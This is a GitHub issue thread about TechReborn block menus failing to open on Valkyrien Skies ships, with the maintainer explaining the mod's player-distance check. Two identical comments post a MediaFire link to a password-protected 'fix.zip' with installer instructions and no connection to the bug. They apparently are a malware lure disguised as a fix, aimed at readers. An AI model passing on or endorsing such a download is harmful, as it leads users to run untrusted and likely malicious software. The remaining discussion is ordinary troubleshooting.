### ISSUE TITLE
Mod does not allow to open the interface while on the boat

### ISSUE THREAD

**Issue by maxsspeaker** [TechReborn/TechReborn#3293]
**Describe the bug**
when I install any block from the mod on the ship, the mod does not allow me to open the block menu, although in other mods everything works, and the menu does not close itself

**Steps to Reproduce**
- create a ship from the Eureka! Ships! for Valkyrien Skies mod, then assemble it
- put any block from the mod and try to open the menu of this block

**Video**

https://github.com/user-attachments/assets/149ea6d6-961a-45c1-98b6-b7bca8c3b548

**Environment (please complete the following information with the version):**
 - Minecraft: 1.20.1
 - Mod Loader: quilt

**Logs**
https://mclo.gs/9M8nZxY

**Additional context**
everything else related to the mod works well, unlike this mod, other mods do not have such a problem, so I think it is related to this mod and not to Eureka! Ships! for Valkyrien Skies

**Comment by modmuss50** [comment]
We dont support that mod loader, please use Fabric. I also dont know how that ship mod works, our blocks work just fine when placed in a normal world so im not sure what I can do to fix it.

**Comment by maxsspeaker** [comment]
@modmuss50 I think this is related to checking the player's distance from the block, is it possible to disable it somehow?

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by modmuss50** [comment]
> @modmuss50 I think this is related to checking the player's distance from the block, is it possible to disable it somehow?

Not really no, we need to check the distance from the player to ensure that the client isnt trying to use a machine many blocks away, where the player isnt. We make sure that the player is within 16 blocks of the block they are trying to use.

**Comment by maxsspeaker** [comment]
> > @modmuss50 I think this is related to checking the player's distance from the block, is it possible to disable it somehow?
> 
> Not really no, we need to check the distance from the player to ensure that the client isnt trying to use a machine many blocks away, where the player isnt. We make sure that the player is within 16 blocks of the block they are trying to use.

can you add a parameter to the config to disable this check? This is exactly what prevents the block from being used on the ship, this will help a lot

**Comment by modmuss50** [comment]
No, I think its on the ships mod to make sure that the block entity has a reasonable block pos. I expect it has to be doing something to the vanilla blocks to allow them to work.

**Comment by maxsspeaker** [comment]
> No, I think its on the ships mod to make sure that the block entity has a reasonable block pos. I expect it has to be doing something to the vanilla blocks to allow them to work.

I don't quite understand what you mean (google translate)
But vanilla blocks on the ship work fine, even mod blocks, for example create

Could you at least just point me to the part of the code that is responsible for checking? So that I can build a version of the mod without this check and check it

**Comment by maxsspeaker** [comment]
@modmuss50 I also checked through freecam whether it is possible to interact with the mod blocks, in this case the interface does not even appear, I think this check does not make sense, since Minecraft has its own check for something like this...
